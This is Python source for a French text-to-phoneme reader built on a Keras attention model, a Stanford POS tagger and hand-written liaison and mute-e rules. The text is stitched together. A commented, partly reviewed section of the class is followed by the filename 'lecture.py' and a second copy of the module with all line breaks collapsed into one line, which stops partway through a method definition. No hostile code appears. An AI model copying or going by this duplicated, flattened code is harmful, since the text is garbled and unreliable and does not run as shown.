    def _set_dico_unique(self, dico_unique):
        self._dico_unique = dico_unique
        self._ortho_unique = dico_unique.keys()

    def _get_ortho_unique(self):
        return self._ortho_unique

    def _set_ortho_unique(self, valeur):
        raise AttributeError("ortho_unique ne peut pas etre modifie")

    def _get_dico_multiple(self):
        return self._dico_multiple

    def _set_dico_multiple(self, dico_multiple):
        self._dico_multiple = dico_multiple
        self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()]))

    def _get_ortho_multiple(self):
        return self._ortho_multiple

    def _set_ortho_multiple(self, valeur):
        raise AttributeError("ortho_multiple ne peut pas etre modifie")

    dico_unique = property(fget=_get_dico_unique, fset=_set_dico_unique)
    ortho_unique = property(fget=_get_ortho_unique, fset=_set_ortho_unique)
    dico_multiple = property(fget=_get_dico_multiple, fset=_set_dico_multiple)
    ortho_multiple = property(fget=_get_ortho_multiple, fset=_set_ortho_multiple)

    # --- data preparation ---------------------------------------------------
    def one_hot_from_list(self, data):
        """One-hot encode (word, pronunciation) couples.

        :param data: list of (word, phonemes) couples
        :return: (x, y) arrays of shape (m, tx+1, n_l) and (m, ty+1, n_p);
                 sequences are right-padded with the blank character.
        """
        m = len(data)
        n_l = len(self.l2idx.keys())
        n_p = len(self.p2idx.keys())
        x = np.zeros((m, self.tx + 1, n_l))
        y = np.zeros((m, self.ty + 1, n_p))
        for i, mp in enumerate(data):
            # Pad with blanks up to tx+1 / ty+1 to mark the sequence end.
            mot, pron = ("{m}{b}".format(m=mp[0], b=self.blank * (self.tx + 1 - len(mp[0]))),
                         "{m}{b}".format(m=mp[1], b=self.blank * (self.ty + 1 - len(mp[1]))))
            for j, c in enumerate(mot):
                x[i, j, self.l2idx[c]] = 1
            for j, c in enumerate(pron):
                y[i, j, self.p2idx[c]] = 1
        return x, y

    # --- model --------------------------------------------------------------
    def model(self):
        """Build the attention seq2seq network (one softmax per phoneme slot)."""
        n_l = len(self.l2idx)
        n_p = len(self.p2idx)
        x = Input(shape=(self.tx, n_l), name="mot")
        c0 = Input(shape=(self.n_h1,), name='c0')
        c = c0
        h0 = Input(shape=(self.n_h1,), name='h0')
        h = h0
        outputs = list()
        # Encoder over the letters.
        a = Bidirectional(LSTM(units=self.n_brnn1, return_sequences=True, name="LSTM_orthographe"))(x)
        a = Dropout(0.2, name="dropout_LSTM_orthographe")(a)
        for t in range(self.ty):
            # Additive attention over the encoder outputs.
            h_rep = RepeatVector(self.tx, name="att_repeat_phoneme{}".format(t))(h)
            ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a])
            energies = Dense(units=self.n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah)
            energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies)
            alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies)
            context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a])
            h, c = GRU(units=self.n_h1, activation='tanh', recurrent_activation='sigmoid', return_state=True,
                       name="GRU_phoneme{}".format(t))(inputs=context, initial_state=c)
            h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h)
            c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c)
            outy = Dense(activation="softmax", units=n_p, name="softmax_phoneme_{}".format(t))(h)
            outputs.append(outy)
        net = Model(inputs=[x, c0, h0], outputs=outputs)
        return net

    def compile_train(self, x, y, epochs=10, batch_size=64, opt=None):
        """Compile (if needed) and train the network on one-hot data.

        :param x: inputs of shape (m, tx+1, n_l)
        :param y: targets of shape (m, ty+1, n_p)
        :param opt: optimizer; a fresh Adam() is created when None
        :return: the trained keras Model
        """
        # BUG FIX: the default was `opt=Adam()`, a mutable default argument —
        # one optimizer instance (and its internal state) was created at
        # import time and shared by every call. Use a None sentinel instead.
        if opt is None:
            opt = Adam()
        m = x.shape[0]
        if self.net is None:
            self.net = self.model()
            self.net.summary()
        self.net.compile(optimizer=opt, loss="categorical_crossentropy", metrics=["accuracy"])
        h0 = csr_matrix((m, self.n_h1))
        c0 = csr_matrix((m, self.n_h1))
        # One target array per output phoneme position.
        y_list = list(y.swapaxes(0, 1))
        self.net.fit([x, c0, h0], y_list, epochs=epochs, batch_size=batch_size)
        return self.net

    # --- tokenisation -------------------------------------------------------
    def regex_lecteur(self, phrase, trad_numbers=False):
        """Tokenize with a character class built from the known alphabet.

        :param phrase: text to tokenize
        :param trad_numbers: also accept digits (before number spelling-out)
        :return: list of tokens
        """
        if trad_numbers:
            reg0 = "0-9"
        else:
            reg0 = ""
        # Characters excluded from the class (the '-' is re-added last so it
        # cannot be read as a regex range).
        skip = [" ", ".", '-', self.blank]
        trait_dunion = False
        for c in self.l2idx.keys():
            if c == '-':
                trait_dunion = True
            if c not in skip:
                reg0 = "{}{}".format(reg0, c)
        if trait_dunion:
            reg0 = "{}-".format(reg0)
        reg = "[{}]+".format(reg0)
        res = RegexpTokenizer(reg).tokenize(phrase)
        return res

    def tirets_appostrophes(self, a_decouper):
        """Split a token on apostrophes/hyphens, regrouping into known words.

        :param a_decouper: token containing "'" and/or "-"
        :return: list of sub-tokens, greedily merged into dictionary words
        """
        # Apostrophes: keep them attached to the left part ("l'" + "arbre").
        if a_decouper[0] == "'":
            a_decouper = a_decouper[1:]
        a_decouper = [splitted for splitted in a_decouper.split("'") if len(splitted) > 0]
        if len(a_decouper) > 1:
            for i in range(len(a_decouper) - 1):
                a_decouper[i] = "{}'".format(a_decouper[i])
        # Hyphens: keep them attached to the right part ("va" + "-t-en").
        decoupe = list()
        if a_decouper[-1][-1] == '-':
            a_decouper[-1] = a_decouper[-1][:-1]
        for partie in a_decouper:
            partie_splitted = [par for par in partie.split("-") if len(par) > 0]
            if len(partie_splitted) > 1:
                for i in range(1, len(partie_splitted)):
                    partie_splitted[i] = "-{}".format(partie_splitted[i])
            decoupe.extend(partie_splitted)
        # Greedy vocabulary lookup: take the longest prefix of parts that
        # forms a known word; `decoupe` shrinks as `tokens` fills up.
        tokens = list()
        while len(decoupe) > 0:
            p = len(decoupe)
            if decoupe[0][0] == '-':
                # Drop a leading hyphen before the lookup.
                decoupe[0] = decoupe[0][1:]
            element = "".join(decoupe)
            element_know = (element in self.ortho_unique) or (element in self.ortho_multiple)
            while not element_know and p > 1:
                p -= 1
                element = "".join(decoupe[:p])
                element_know = (element in self.ortho_unique) or (element in self.ortho_multiple)
            tokens.append(element)
            decoupe = decoupe[p:]
        return tokens

    def tokenizer(self, phrase):
        """Home-grown tokenizer: lowercases, normalises ligatures/apostrophes,
        splits on the known alphabet, resolves hyphen/apostrophe compounds and
        spells out digit sequences.

        :param phrase: sentence to tokenize
        :return: list of tokens
        """
        phrase = phrase.lower()
        # Ligatures.
        phrase = phrase.replace("œ", "oe")
        phrase = phrase.replace("æ", "ae")
        # Typographic apostrophe.
        phrase = phrase.replace("’", "'")
        # First pass, digits allowed.
        tokens = self.regex_lecteur(phrase, trad_numbers=True)
        # Resolve apostrophes / hyphens in-place.
        i = 0
        while i < len(tokens):
            tok = tokens[i]
            if any(appostrophe_ou_trait in tok for appostrophe_ou_trait in ['-', "'"]) and len(tok) > 1:
                tokens.pop(i)
                tokens_to_add = self.tirets_appostrophes(tok)
                for token_to_add in tokens_to_add:
                    tokens.insert(i, token_to_add)
                    i += 1
            else:
                i += 1
        # Spell out numbers, then re-tokenize the spelled-out text.
        for i, tok in enumerate(tokens):
            if tok.isdigit():
                tokens[i] = tradn(int(tok))
        phrase = " ".join(tokens)
        tokens = self.regex_lecteur(phrase, trad_numbers=False)
        return tokens

    def tokenizer_poem(self, poem):
        """Tokenize a poem: list of stanzas, each a list of verse strings."""
        print(self.count_lecture)
        self.count_lecture += 1
        poem_tokens = list()
        for strophe in poem:
            strophe_tokens = list()
            for ver in strophe:
                ver_tokens = self.tokenizer(ver)
                strophe_tokens.append(ver_tokens)
            poem_tokens.append(strophe_tokens)
        return poem_tokens

    # --- reading ------------------------------------------------------------
    def lire_nn(self, mots):
        """Predict pronunciations with the neural model.

        :param mots: iterable of out-of-dictionary words
        :return: dict word -> predicted phoneme string (blanks stripped)
        """
        # One-hot encode the (blank-padded) words.
        m = len(mots)
        n_l = len(self.l2idx)
        x = np.zeros((m, self.tx + 1, n_l))
        for i, mot in enumerate(mots):
            mot = str(mot)
            mot = "{m}{b}".format(m=mot, b=self.blank * (self.tx + 1 - len(mot)))
            lettres = [self.l2idx[lettre] for lettre in mot]
            for j, lettre in enumerate(lettres):
                x[i, j, lettre] = 1
        # Predict (zero initial decoder states).
        h0 = np.zeros((m, self.n_h1))
        c0 = np.zeros((m, self.n_h1))
        y = self.net.predict(x=[x, c0, h0])
        # Index -> phoneme mapping.
        idx2p = dict()
        for p, idx in self.p2idx.items():
            idx2p[idx] = p
        # Stack the per-position softmax outputs, then argmax to indices.
        n_p = len(self.p2idx)
        pron_int = np.zeros((m, n_p, self.ty + 1))
        for i in range(self.ty + 1):
            pron_int[:, :, i] = y[i]
        pron_int = pron_int.argmax(axis=1)
        # Decode indices to phoneme strings, dropping the blank padding.
        prononciation = dict()
        for i, mot in enumerate(mots):
            prononciation_mot = ""
            for idx in pron_int[i, :].tolist():
                prononciation_mot = "{phons}{p}".format(phons=prononciation_mot,
                                                        p=idx2p[idx]).replace(self.blank, "")
            prononciation[mot] = prononciation_mot
        return prononciation

    def lire_mots(self, mots):
        """Pronounce a token list: dictionary first, neural model as fallback.

        :param mots: list of tokens (in sentence order)
        :return: list of phoneme strings, aligned with `mots`
        """
        # Partition the words by lookup strategy.
        mots_unique = set()
        mots_multiples = set()
        mots_nn = set()
        pos_mots = pos_tag(mots)
        dico_nn = 0  # only populated (as a dict) when mots_nn is non-empty
        for mot in mots:
            if mot in self.ortho_unique:
                mots_unique.update([mot])
            elif mot in self.ortho_multiple:
                mots_multiples.update([mot])
            else:
                mots_nn.update([mot])
        if len(mots_multiples) > 0:
            # Ambiguous words whose (word, tag) couple is unknown fall back to
            # the neural model.
            for m, p in pos_mots:
                if m in mots_multiples and (m, p) not in self.dico_multiple.keys():
                    mots_multiples.remove(m)
                    mots_nn.update([m])
        if len(mots_nn) > 0:
            dico_nn = self.lire_nn(mots_nn)
        # Reassemble pronunciations in token order.
        prononciation = list()
        for i, mot in enumerate(mots):
            prononciation_mot = ""
            if mot in mots_unique:
                prononciation_mot = self.dico_unique[mot]
            elif mot in mots_multiples:
                prononciation_mot = self.dico_multiple[pos_mots[i]]
            elif mot in mots_nn:
                prononciation_mot = dico_nn[mot]
            prononciation.append(prononciation_mot)
        return prononciation

    def lire_vers(self, vers, count=False):
        """Read one verse.

        :param vers: verse as a string
        :param count: print/advance the read counter when True
        :return: the verse read aloud, as one unspaced phoneme string
        """
        if count:
            print(self.count_lecture)
            self.count_lecture += 1
        tokens = self.tokenizer(vers)
        pos = pos_tag(tokens)
        mots_lus = self.lire_mots(tokens)
        # Mute-e handling first, then liaisons.
        mots_lus_avec_e = e_final_tokens(tokens, mots_lus, pos, vers)
        mots_lus_liaisons = liaisons_tokens(tokens, mots_lus_avec_e, pos, vers)
        vers_lu = "".join(mots_lus_liaisons)
        return vers_lu

    def lire_strophe(self, strophe, ponctuation=None):
        """Read a stanza sentence by sentence.

        :param strophe: list of verse strings
        :param ponctuation: sentence-breaking characters (default . , ! ? …)
        :return: (pronunciations, POS tags), both flat lists over all tokens
        """
        if ponctuation is None:
            ponctuation = ['.', ',', '!', '?', "…"]
        # Split the joined stanza into punctuation-free sentences.
        text_strophe = " ".join(strophe)
        reg0 = "".join(ponctuation)
        reg0 = "(?:(?![{caracteres_a_eviter}]).)+".format(caracteres_a_eviter=reg0)
        phrases_strophe = [phrase for phrase in RegexpTokenizer(reg0).tokenize(text_strophe)
                           if len(phrase) > 0]
        # Read each sentence.
        phrases_lues = list()
        pos_phrases = list()
        for phrase in phrases_strophe:
            tokens_phrase = self.tokenizer(phrase)
            phrases_lues.extend(self.lire_mots(tokens_phrase))
            pos_phrases.extend(pos_tag(tokens_phrase))
        return phrases_lues, pos_phrases

    def lire_poem(self, poem_tokens, poem_text):
        """Read a whole poem.

        :param poem_tokens: output of tokenizer_poem (stanzas of token lists)
        :param poem_text: matching raw text (stanzas of verse strings)
        :return: list of stanzas, each a list of per-verse phoneme strings
        """
        print(self.count_lecture)
        self.count_lecture += 1
        poem_phonemes_tokens = list()
        assert len(poem_tokens) == len(poem_text), "Les listes de textes et des tokens ont des longueurs differentes"
        for idx_s, strophe in enumerate(poem_tokens):
            strophe_text = poem_text[idx_s]
            strophe_phonemes_tokens = list()
            pos_strophe = list()
            phrase_a_lire = list()
            # Read the stanza as one token sequence, but keep per-verse slots.
            for ver_tokens in strophe:
                n_tok_ver = len(ver_tokens)
                phrase_a_lire.extend(ver_tokens)
                strophe_phonemes_tokens.append(n_tok_ver * [''])
                pos_strophe.append(n_tok_ver * [''])
            phrase_lue = self.lire_mots(phrase_a_lire)
            pos_phrase = pos_tag(phrase_a_lire)
            # Redistribute the flat results back into the verse slots
            # (i = position within verse, j = verse index).
            i = 0
            j = 0
            for idx, phoneme_mot in enumerate(phrase_lue):
                while len(strophe_phonemes_tokens[j]) == 0:
                    # Empty verse: collapse its slot to an empty string.
                    strophe_phonemes_tokens[j] = ""
                    pos_strophe[j] = []
                    i = 0
                    j += 1
                strophe_phonemes_tokens[j][i] = phoneme_mot
                pos_strophe[j][i] = pos_phrase[idx]
                i += 1
                if i == len(strophe_phonemes_tokens[j]):
                    i = 0
                    j += 1
            # Apply mute-e and liaison rules per verse, then join to strings.
            for idx in range(len(strophe_phonemes_tokens)):
                if len(strophe_phonemes_tokens[idx]) > 1:
                    strophe_phonemes_tokens[idx] = e_final_tokens(strophe[idx], strophe_phonemes_tokens[idx],
                                                                  pos_strophe[idx], strophe_text[idx])
                    strophe_phonemes_tokens[idx] = liaisons_tokens(strophe[idx], strophe_phonemes_tokens[idx],
                                                                   pos_strophe[idx], strophe_text[idx])
                strophe_phonemes_tokens[idx] = "".join(strophe_phonemes_tokens[idx])
            # Defensive: a stanza with a single empty verse reads as [''].
            if strophe_phonemes_tokens == [[]]:
                strophe_phonemes_tokens = ['']
            poem_phonemes_tokens.append(strophe_phonemes_tokens)
        return poem_phonemes_tokens

    # --- evaluation ---------------------------------------------------------
    def evaluate_model_from_lists(self, liste, batch_size=256):
        """Print loss and per-position accuracy of the model on a couple list.

        :param liste: list of (word, pronunciation) couples to evaluate on
        :param batch_size: evaluation batch size
        """
        x, y_inv = self.one_hot_from_list(liste)
        y = list(y_inv.swapaxes(0, 1))
        h0 = csr_matrix((x.shape[0], self.n_h1))
        c0 = csr_matrix((x.shape[0], self.n_h1))
        results = self.net.evaluate([x, c0, h0], y, batch_size=batch_size)
        print('loss:', results[0])
        for i in range(0, self.ty):
            # NOTE(review): the `i + self.ty + 2` offset assumes the layout of
            # keras' evaluate() result list (losses then metrics) — confirm
            # against the installed keras version.
            print('acc char {}:'.format(i), results[i + self.ty + 2])

    def mispredicted(self, t_l, batch_size=256):
        """Return the couples the model gets wrong.

        :param t_l: list of (word, pronunciation) couples
        :param batch_size: prediction batch size
        :return: list of [word, expected pronunciation, predicted pronunciation]
        """
        unique_couples = list(set(t_l))  # deduplicate the input couples
        missed = list()
        x, y = self.one_hot_from_list(data=unique_couples)
        m = x.shape[0]
        y_a = y.argmax(axis=2)
        print(y_a.shape)
        c0 = csr_matrix((m, self.n_h1))
        h0 = csr_matrix((m, self.n_h1))
        y_hat_list = self.net.predict(x=[x, c0, h0], batch_size=batch_size)
        pred_phon = list()
        # Index -> phoneme mapping.
        idx2p = dict()
        for p, idx in self.p2idx.items():
            idx2p[idx] = p
        # Collect per-position argmax predictions into one (m, ty+1) matrix.
        for i in range(self.ty + 1):
            mat_yi_hat = y_hat_list[i].argmax(axis=1).reshape((m, 1))
            pred_phon.append(mat_yi_hat)
        y_hat_a = np.concatenate(pred_phon, axis=1)
        # Turn each mismatch back into readable phoneme strings.
        for i in range(m):
            bonne_prediction = pd.Series(y_hat_a[i, :] == y_a[i, :]).all()
            if not bonne_prediction:
                vecteur_predit = y_hat_a[i, :].tolist()
                prononciation_predite = "".join([idx2p[idx] for idx in vecteur_predit]).replace(self.blank, "")
                missed.append([unique_couples[i][0], unique_couples[i][1], prononciation_predite])
        return missed

    def save(self, path):
        """Persist the underlying keras model to `path`."""
        self.net.save(path)


# NOTE(review): this guard fires when the module is *imported* under the name
# "lecture" (not when run as a script) — presumably intentional, to set
# JAVAHOME for the Stanford tagger on this machine before any pos_tag call.
# Confirm before changing it to the conventional "__main__".
if __name__ == "lecture":
    os.environ['JAVAHOME'] = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe"
lecture.py
from trad_chiffre_mot import tradn import os import numpy as np from scipy.sparse import csr_matrix import pandas as pd from nltk.tag import StanfordPOSTagger from nltk.tokenize import RegexpTokenizer from keras import Input from keras.layers import Bidirectional, LSTM, Dropout, RepeatVector, Concatenate, Dense, Activation, Dot, GRU from keras.models import Model from keras.optimizers import Adam from sklearn.model_selection import train_test_split def filter_length(df, n=8, phon="2_phon", sup_n=True): phonemes = df.loc[:, phon] if sup_n: filtre = phonemes.apply(lambda x: len(x) >= n) else: filtre = phonemes.apply(lambda x: len(x) < n) return df.loc[filtre, :] def sample(df, m=1000, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param m: 1000 taille des donnees :param seed: graine aleatoire de l'echantillonage :return: liste de tuples (mot, prononciation), liste contenant les probabilités """ list_w2p = [] list_occ = [] for row in df[[mots, phon, occurances]].to_numpy(): w, p, o = tuple(row) list_w2p.append([w, p]) list_occ.append(o) list_occ = np.array(list_occ) # normalisation if ln_dist: list_occ = np.log(list_occ + 1) list_occ = list_occ / np.sum(list_occ) # format liste list_tuples = [tuple(couple) for couple in list_w2p] list_occ = list_occ.tolist() n_occ = len(list_tuples) np.random.seed(seed) distr = np.random.choice(a=range(n_occ), size=m, p=list_occ).tolist() return [list_tuples[i] for i in distr] def train_dev(df, test_size=0.01, m=1000, forced_train=None, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param test_size: 0.01 :param m: 1000 
taille des donnees de train :param forced_train: liste de mots a avoir dans les donnees d'entrainement :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param seed: graine aleatoire du train_test_split et de l'echantillonage :return: listes de tuples des train """ if forced_train is None: forced_train = [] train_df, test_df = train_test_split(df, test_size=test_size, random_state=seed) if len(forced_train) > 0: # rajout des mots dans les donnees de test forced_idx = test_df[mots].apply(lambda x: x in forced_train) forced = test_df.loc[forced_idx, :] train_df = train_df.append(forced, ignore_index=True) test_df = test_df.loc[-forced_idx, :] train_s = sample(train_df, m=m, mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) test_s = sample(test_df, m=int(m * test_size), mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) return train_s, test_s def model_test(tx, ty, n_l, n_p, n_brnn1=32, n_h1=64): x = Input(shape=(tx, n_l)) c0 = Input(shape=(n_h1,), name='c0') h0 = Input(shape=(n_h1,), name='h0') c = c0 h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=n_brnn1, return_sequences=True, name="LSTM_mot"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(ty): # Attention h_rep = RepeatVector(tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = 
GRU(units=n_h1, activation='tanh', recurrent_activation='tanh', return_state=True, name="LSTM_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="LSTM_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def pos_tag(mots, jar=os.path.join(".", "models", "stanford-postagger", "stanford-postagger-3.8.0.jar"), mdl=os.path.join(".", "models", "stanford-postagger", "french-ud.tagger")): try: pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') except LookupError: java_path = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe" os.environ['JAVAHOME'] = java_path pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') tagged = pos_tagger.tag(mots) tags = [g for m, g in tagged] forced_det = ["au", "aux"] absent_of_table = ["PART", "SCONJ"] if any(item in mots for item in forced_det) or any(item in tags for item in absent_of_table): for i, couple in enumerate(tagged): mot = couple[0] gram = couple[1] if mot in forced_det: tagged[i] = (mot, "DET") if gram == "PART": tagged[i] = (mot, "ADV") if gram == "SCONJ": tagged[i] = (mot, "CONJ") return tagged def check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): """ Fonction qui verifie si la liaison est possible entre deux mots :param ortho1: orthographe du mot en position 1 :param ortho2: orthographe du mot en position 2 :param phon1: phonemes du mot en position 1 :param phon2: phonemes du mot en position 2 :param nat1: nature du mot en position 1 :param nat2: nature du mot en position 2 :param phrase: phrase de contexte :return: booleen sur la possibilite de liaison """ voyelles_p = kwargs.get("voyelles_p", ['a', 'E', '§', 'o', 'O', '1', 'i', '5', 'e', 'u', '@', '°', '9', 'y', '2']) y_p = kwargs.get("y_p", ['w', 'j', '8']) consonnes_liaisons = {'d': ['d'], 'p': ["p"], 
'r': ["R"], 's': ['s', 'z'], 't': ['t'], 'x': ['s', 'z'], 'n': ['n', 'G'], 'z': ['z', 's']} liables = False mot2_voyelle = ((phon2[0] in y_p) or (phon2[0] in voyelles_p)) and (ortho2[0] != 'h') if mot2_voyelle: mot1_consonne_liaison = (ortho1[-1] in consonnes_liaisons.keys()) and\ (phon1[-1] not in consonnes_liaisons[ortho1[-1]]) if mot1_consonne_liaison: mot1_dern_son_voyelle = (ortho1[-1] in consonnes_liaisons.keys()) and (phon1[-1] in voyelles_p) pas_ponctuation = (" ".join([ortho1, ortho2]) in phrase) or ("-".join([ortho1, ortho2]) in phrase) if pas_ponctuation: if (nat1 in ["NUM", "DET", "ADJ"]) and (nat2 in ["NOUN", "PROPN"]): liables = True elif ortho1 in ["on", "nous", "vous", "ils", "elles", "en", "tout"] and nat2 in ["AUX", "VERB"]: liables = True elif nat1 in ["AUX", "VERB"] and mot1_dern_son_voyelle: liables = True elif nat1 in ["ADP"]: liables = True elif (nat1 in ["NOUN"]) and (ortho1[-1] in ['s']) and (nat2 in ["ADJ"]): liables = True elif (nat1 == "ADV") and (nat2 in ["ADV", "ADJ", "NOUN"]): liables = True elif (ortho1 == "quand") and (nat2 not in ["AUX", "VERB"]): liables = True elif (ortho1 == "plus") and (ortho2 == "ou"): liables = True elif (ortho1 == "tout") and (ortho2 in ["à", "autour"]): liables = True return liables def liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): dico_liaisons_simples = kwargs.get("dico_liaisons", {'d': 't', 'p': 'p', 's': 'z', 't': 't', 'x': 'z', 'z': 'z'}) mots_nasale_simples = kwargs.get("mots_nasale_simples", ["aucun", "bien", "en", "on", "rien", "un", "non", "mon", "ton", "son"]) liaison_a_faire = check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs) if liaison_a_faire: derniere_lettre = ortho1[-1] if derniere_lettre in dico_liaisons_simples.keys(): phon1 = "{}{}".format(phon1, dico_liaisons_simples[derniere_lettre]) if derniere_lettre == 'r' and phon1[-1] == "e": # comme "premier" phon1 = "{}{}".format(phon1[:-1], "ER") if derniere_lettre == 'n': # comme "bon", "certain", 
"commun" dernier_phoneme = phon1[-1] if (ortho1 in mots_nasale_simples) or (dernier_phoneme == "1"): phon1 = "{}{}".format(phon1, 'n') else: if dernier_phoneme == "§": phon1 = "{}{}".format(phon1[:-1], "On") if dernier_phoneme == "@" and ortho1[-2:] == "an": phon1 = "{}{}".format(phon1[:-1], "an") if dernier_phoneme == "5": if ortho1[-2:] == "en": phon1 = "{}{}".format(phon1[:-1], "En") if ortho1[-2:] == "in": phon1 = "{}{}".format(phon1[:-1], "in") if ortho1[-3:] in ["ein", "ain"]: phon1 = "{}{}".format(phon1[:-2], "En") return phon1 def e_final(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): e_potentiel = (ortho1[-1] == 'e') or (ortho1[-2:] == 'es') or (ortho1[-3:] == 'ent') son_final = phon1[-1] son_initial = phon2[0] lettre_initiale = ortho2[0] consonnes_p = ['k', 'p', 'l', 't', 'R', 'j', 'f', 's', 'd', 'Z', 'n', 'b', 'v', 'g', 'v', 'g', 'm', 'z', 'w', 'S', 'N', '8', 'G', 'x'] lien_mots = (son_final in consonnes_p) and ((son_initial in consonnes_p) or lettre_initiale == 'h') if e_potentiel and lien_mots: phon1 = "{}°".format(phon1) elif e_potentiel and (son_final in consonnes_p): # "e" et liaison quand le 2e mot commence par une voyelle phon1_e = "{}°".format(phon1) phon1_e_liaison = liaison(ortho1, ortho2, phon1_e, phon2, nat1, nat2, phrase, **kwargs) if phon1_e != phon1_e_liaison: phon1 = phon1_e_liaison return phon1 def liaisons_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = liaison(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase.lower()) return prononciation def e_final_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = e_final(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase) return prononciation class Lecteur: """"Classe definissant le lecteur """ def __init__(self, tx, ty, l2idx, p2idx, dico_unique, 
dico_multiple, n_brnn1=90, n_h1=80, net=None, blank="_"): self.tx = tx self.ty = ty self.l2idx = l2idx self.p2idx = p2idx self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) self.n_brnn1 = n_brnn1 self.n_h1 = n_h1 self.net = net self.blank = blank self.count_lecture = 0 # setters et getters def _get_dico_unique(self): return self._dico_unique def _set_dico_unique(self, dico_unique): self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() def _get_ortho_unique(self): return self._ortho_unique def _set_ortho_unique(self, valeur): raise AttributeError("ortho_unique ne peut pas etre modifie") def _get_dico_multiple(self): return self._dico_multiple def _set_dico_multiple(self, dico_multiple): self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) def _get_ortho_multiple(self): return self._ortho_multiple def _set_ortho_multiple(self, valeur): raise AttributeError("ortho_multiple ne peut pas etre modifie") dico_unique = property(fget=_get_dico_unique, fset=_set_dico_unique) ortho_unique = property(fget=_get_ortho_unique, fset=_set_ortho_unique) dico_multiple = property(fget=_get_dico_multiple, fset=_set_dico_multiple) ortho_multiple = property(fget=_get_ortho_multiple, fset=_set_ortho_multiple) # methodes def one_hot_from_list(self, data): """ :param data: liste des couples (mot, phonemes) :return: """ m = len(data) n_l = len(self.l2idx.keys()) n_p = len(self.p2idx.keys()) x = np.zeros((m, self.tx + 1, n_l)) y = np.zeros((m, self.ty + 1, n_p)) for i, mp in enumerate(data): mot, pron = ("{m}{b}".format(m=mp[0], b=self.blank * (self.tx + 1 - len(mp[0]))), # rajout des _ pour # signifier la fin "{m}{b}".format(m=mp[1], b=self.blank * (self.ty + 1 - len(mp[1])))) for j, c in enumerate(mot): x[i, j, self.l2idx[c]] = 1 for j, c in enumerate(pron): y[i, j, self.p2idx[c]] = 1 return x, 
y # Modelisation def model(self): n_l = len(self.l2idx) n_p = len(self.p2idx) x = Input(shape=(self.tx, n_l), name="mot") c0 = Input(shape=(self.n_h1,), name='c0') c = c0 h0 = Input(shape=(self.n_h1,), name='h0') h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=self.n_brnn1, return_sequences=True, name="LSTM_orthographe"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(self.ty): # Attention h_rep = RepeatVector(self.tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=self.n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = GRU(units=self.n_h1, activation='tanh', recurrent_activation='sigmoid', return_state=True, name="GRU_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="softmax_phoneme_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def compile_train(self, x, y, 